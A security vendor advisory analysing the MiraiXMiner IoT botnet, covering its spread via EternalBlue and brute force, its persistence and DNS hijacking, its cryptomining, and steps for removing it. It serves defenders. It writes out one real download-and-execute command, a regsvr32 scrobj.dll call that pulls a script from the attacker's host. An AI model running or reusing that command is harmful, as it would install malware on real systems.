Alert: MiraiXMiner IoT Botnet Featuring Multiple Virus Families!

05/12/2018 15:40:36

Alert: MiraiXMiner IoT Botnet Featuring Multiple Virus Families!


The Sangfor Security team has recently discovered a new IoT botnet with unique features found in several different virus families including Mirai, Mykings and Dark Cloud Trojan. Sangfor has named this new botnet MiraiXMiner and by tracking and monitoring it’s progress have discovered that it spreads through EternalBlue and vulnerabilities in CCTV IoT-capable devices, MS SQL, RDP Brute-force and Telnet brute-force attacks.

1. Attack Procedures
1. Virus vector msinfo.exe performs persistent attacks through service registration and malicious code injection.
2. C&C command is performed to download arbitrary attack module. MiraiXMiner downloads csrs.exe.
3. Privileged admin user account is added.
4. 3 submodules are downloaded: backdoor, DNS hijacking and cleanup (backdoor module up.rar is a well-known Dark Cloud BootKit).
5. u.exe hijacks DNS by altering DNS configuration files.
6. Cleanup module upsnew2.exe performs multiple roles including disabling the virus, adding auto boot items and stopping Windows Update service, to manipulate hosts in the long-term while continuing to download and perform mining operations.
7. Uses scanner and Mirai attack database to initiate large-scale attack on the internal network.
8. The function vector msinfo.exe connects to the cloud to auto-update the virus and the latest attack module.



2. Propagation Module

Scan on port 445, as shown below:

Perform scanning operations via internal MASSCAN program, as shown below:

Perform scanning operations via internal Nmap program, as shown below:

Attacks are launched against any vulnerable targets discovered.
The following shows an EternalBlue attack CrackerMS17010 in progress:


Attacks are launched by exploiting the CrackerCCTV vulnerability in CCTV IoT-capable devices, as shown below:


Attacks are launched by leveraging the CrackerMSSQL vulnerability in MSSQL, as shown below:


Database commands are executed, as shown below:


Malicious code is written in database storage, as shown below:


CrackerRDP conducts an attack against RDP, as shown below:


CrackerTelnet conducts an attack against Telnet, as shown below:


3. Creating Admin Account
The attacker downloads and decrypts the corresponding configuration file from a remote server, as shown below:


The downloaded config file is decrypted as an XML file to download and run the malicious program, as shown below:


The downloaded executable file CSRS is created with a python script. It is an exploit used for creating accounts, leveraging the vulnerability MS17010, as shown below:


An admin account is created on the host, as shown below:


An attacked is launched using the vulnerability MS17010, as shown below:

Attack parameters are as shown below:


4. Cryptomining and Dark Cloud Trojan
Download malicious program by starting regsvr32 /s /u /n /i:http://up.ms1128.site:8888\\s1.txt scrobj.dll, as shown below:

Decrypt the above XML script, as shown below:


Upsnew2 drops Dark Cloud Trojan item.dat and c3.bat script. The c3.bat script has the following functions:

Removes other viruses:

Enables MSSQLSERVER:

Alters registry and scheduled task settings to allow the virus to auto launch at host startup:

Disables auto update:

Loads the Dark Cloud Trojan:

Alters firewall configuration to disable ports (135, 137, 138, 139 and 445), preventing the host from being infected by other viruses.


5. Solution
1. Isolate the infected hosts, end all connections and disable network adapter.
2. Stop virus spread channel by disabling network sharing SMB port 445 and ending all suspicious outgoing connections. Sangfor NGAF customers should update the signature database to 20181204 and above as well as enable IPS and APT detection.
3. Remove the virus with Sangfor EDR tools which can be download here: http://go.sangfor.com/edr-tool-20181122
4. Fix the vulnerability by installing the patch ms17-010 from Microsoft for Eternal Blue


Our Social Networks

Global Service Center:

COPYRIGHT © 2000-2018 SANGFOR TECHNOLOGIES INC. ALL RIGHTS RESERVED.